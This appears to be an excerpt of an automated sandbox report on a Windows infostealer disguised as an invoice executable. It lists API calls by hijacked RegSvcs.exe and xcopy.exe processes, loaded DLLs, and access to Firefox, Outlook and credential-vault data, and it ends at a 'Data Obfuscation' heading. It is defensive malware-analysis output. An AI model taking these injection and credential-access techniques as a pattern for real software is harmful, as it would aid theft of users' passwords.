                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022C60 NtCreateKey,3_2_01022C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022CA0 NtQueryInformationToken,3_2_01022CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022CC0 NtQueryVirtualMemory,3_2_01022CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022CF0 NtOpenProcess,3_2_01022CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022F30 NtCreateSection,3_2_01022F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022F60 NtCreateProcessEx,3_2_01022F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022F90 NtProtectVirtualMemory,3_2_01022F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022FA0 NtQuerySection,3_2_01022FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022FB0 NtResumeThread,3_2_01022FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022FE0 NtCreateFile,3_2_01022FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022E30 NtWriteVirtualMemory,3_2_01022E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022E80 NtReadVirtualMemory,3_2_01022E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022EA0 NtAdjustPrivilegesToken,3_2_01022EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01022EE0 NtQueueApcThread,3_2_01022EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01023010 NtOpenDirectoryObject,3_2_01023010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01023090 NtSetValueKey,3_2_01023090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010239B0 NtGetContextThread,3_2_010239B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01023D10 NtOpenProcessToken,3_2_01023D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01023D70 NtOpenThread,3_2_01023D70
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03034340 NtSetContextThread,LdrInitializeThunk,6_2_03034340
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03034650 NtSuspendThread,LdrInitializeThunk,6_2_03034650
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032B60 NtClose,LdrInitializeThunk,6_2_03032B60
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03032BA0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03032BE0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03032BF0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032AD0 NtReadFile,LdrInitializeThunk,6_2_03032AD0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032AF0 NtWriteFile,LdrInitializeThunk,6_2_03032AF0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032F30 NtCreateSection,LdrInitializeThunk,6_2_03032F30
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032FB0 NtResumeThread,LdrInitializeThunk,6_2_03032FB0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032FE0 NtCreateFile,LdrInitializeThunk,6_2_03032FE0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03032E80
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03032EE0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03032D10
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03032D30
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032DD0 NtDelayExecution,LdrInitializeThunk,6_2_03032DD0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03032DF0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032C60 NtCreateKey,LdrInitializeThunk,6_2_03032C60
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03032C70
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03032CA0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_030335C0 NtCreateMutant,LdrInitializeThunk,6_2_030335C0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_030339B0 NtGetContextThread,LdrInitializeThunk,6_2_030339B0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032B80 NtQueryInformationFile,6_2_03032B80
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032AB0 NtWaitForSingleObject,6_2_03032AB0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032F60 NtCreateProcessEx,6_2_03032F60
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032F90 NtProtectVirtualMemory,6_2_03032F90
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032FA0 NtQuerySection,6_2_03032FA0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032E30 NtWriteVirtualMemory,6_2_03032E30
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032EA0 NtAdjustPrivilegesToken,6_2_03032EA0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032D00 NtSetInformationFile,6_2_03032D00
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032DB0 NtEnumerateKey,6_2_03032DB0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032C00 NtQueryInformationProcess,6_2_03032C00
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032CC0 NtQueryVirtualMemory,6_2_03032CC0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03032CF0 NtOpenProcess,6_2_03032CF0
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03033010 NtOpenDirectoryObject,6_2_03033010
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03033090 NtSetValueKey,6_2_03033090
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03033D10 NtOpenProcessToken,6_2_03033D10
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_03033D70 NtOpenThread,6_2_03033D70
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_02828F10 NtCreateFile,6_2_02828F10
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_02829200 NtClose,6_2_02829200
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_02829370 NtAllocateVirtualMemory,6_2_02829370
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_02829070 NtReadFile,6_2_02829070
                Source: C:\Windows\SysWOW64\xcopy.exe Code function: 6_2_02829160 NtDeleteFile,6_2_02829160
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030A0CB56_2_030A0CB5
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B132D6_2_030B132D
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0304739A6_2_0304739A
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030052A06_2_030052A0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FED34C6_2_02FED34C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0301B2C06_2_0301B2C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030A12ED6_2_030A12ED
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030CB16B6_2_030CB16B
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0303516C6_2_0303516C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0300B1B06_2_0300B1B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FEF1726_2_02FEF172
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030070C06_2_030070C0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030AF0CC6_2_030AF0CC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B70E96_2_030B70E9
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BF0E06_2_030BF0E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BF7B06_2_030BF7B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030456306_2_03045630
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B16CC6_2_030B16CC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B75716_2_030B7571
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FF14606_2_02FF1460
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0309D5B06_2_0309D5B0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030C95C36_2_030C95C3
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BF43F6_2_030BF43F
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BFB766_2_030BFB76
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0301FB806_2_0301FB80
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03075BF06_2_03075BF0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0303DBF96_2_0303DBF9
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BFA496_2_030BFA49
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B7A466_2_030B7A46
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03073A6C6_2_03073A6C
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03045AA06_2_03045AA0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0309DAAC6_2_0309DAAC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030A1AA36_2_030A1AA3
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030ADAC66_2_030ADAC6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030959106_2_03095910
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030099506_2_03009950
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0301B9506_2_0301B950
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0306D8006_2_0306D800
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030038E06_2_030038E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BFF096_2_030BFF09
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03001F926_2_03001F92
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BFFB16_2_030BFFB1
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FC3FD56_2_02FC3FD5
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02FC3FD26_2_02FC3FD2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03009EB06_2_03009EB0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03003D406_2_03003D40
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B1D5A6_2_030B1D5A
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030B7D736_2_030B7D73
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0301FDC06_2_0301FDC0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_03079C326_2_03079C32
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_030BFCF26_2_030BFCF2
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02811BE06_2_02811BE0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0280CB306_2_0280CB30
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0280ADC66_2_0280ADC6
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0280ADD06_2_0280ADD0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0280CD506_2_0280CD50
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_028152306_2_02815230
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0282B7E06_2_0282B7E0
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_0281346B6_2_0281346B
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_028134706_2_02813470
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02E0E2386_2_02E0E238
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02E0E3536_2_02E0E353
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02E0E6EC6_2_02E0E6EC
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02E0D7B86_2_02E0D7B8
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 6_2_02E0E4C26_2_02E0E4C2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01025130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00FDB970 appears 280 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0105EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0106F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01037E54 appears 102 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 03047E54 appears 111 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 0307F290 appears 105 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 0306EA12 appears 86 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 02FEB970 appears 280 times
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 03035130 appears 58 times
                Source: Due Payment Invoice PISS2024993.exe, 00000000.00000002.2200867109.0000000004B86000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Due Payment Invoice PISS2024993.exe
                Source: Due Payment Invoice PISS2024993.exe, 00000000.00000002.2197154165.000000000152E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Due Payment Invoice PISS2024993.exe
                Source: Due Payment Invoice PISS2024993.exe, 00000000.00000002.2204771229.0000000007970000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Due Payment Invoice PISS2024993.exe
                Source: Due Payment Invoice PISS2024993.exe | Binary or memory string: OriginalFilenameIaWe.exe> vs Due Payment Invoice PISS2024993.exe
                Source: Due Payment Invoice PISS2024993.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Due Payment Invoice PISS2024993.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, vLnWLW2yVODsKcu4eY.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, vLnWLW2yVODsKcu4eY.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, vLnWLW2yVODsKcu4eY.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.Due Payment Invoice PISS2024993.exe.7970000.4.raw.unpack, DElvwy9pvaF1D0fn6T.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, vLnWLW2yVODsKcu4eY.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, vLnWLW2yVODsKcu4eY.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, vLnWLW2yVODsKcu4eY.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4e44cb0.2.raw.unpack, DElvwy9pvaF1D0fn6T.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, vLnWLW2yVODsKcu4eY.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, vLnWLW2yVODsKcu4eY.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, vLnWLW2yVODsKcu4eY.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.Due Payment Invoice PISS2024993.exe.4dbd090.0.raw.unpack, DElvwy9pvaF1D0fn6T.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@10/9
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Due Payment Invoice PISS2024993.exe.log
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Mutant created: NULL
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Mutant created: \Sessions\1\BaseNamedObjects\GCWzYULjgNhXJByAfbtd
                Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Local\Temp\56Q8T4H
                Source: Due Payment Invoice PISS2024993.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: xcopy.exe, 00000006.00000002.3911641445.0000000002A66000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2596131463.0000000002A3A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3911641445.0000000002A3A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2598601470.0000000002A43000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Due Payment Invoice PISS2024993.exe | ReversingLabs: Detection: 34%
                Source: unknown | Process created: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe "C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe"
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe | Process created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Windows\SysWOW64\xcopy.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Section loaded: gpapi.dll
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: ulib.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: ifsutil.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: devobj.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\xcopy.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Due Payment Invoice PISS2024993.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Due Payment Invoice PISS2024993.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Due Payment Invoice PISS2024993.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: xcopy.pdbUGP source: RegSvcs.exe, 00000003.00000002.2419859326.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, cJjnESPXORw.exe, 00000005.00000003.2491694752.0000000000B18000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: IaWe.pdb source: Due Payment Invoice PISS2024993.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cJjnESPXORw.exe, 00000005.00000002.3911462074.000000000009E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2419783426.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2422109688.0000000002E0C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: IaWe.pdbSHA256J source: Due Payment Invoice PISS2024993.exe
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, xcopy.exe, 00000006.00000003.2419783426.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000006.00000003.2422109688.0000000002E0C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: xcopy.pdb source: RegSvcs.exe, 00000003.00000002.2419859326.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, cJjnESPXORw.exe, 00000005.00000003.2491694752.0000000000B18000.00000004.00000001.00020000.00000000.sdmp

                Data Obfuscation

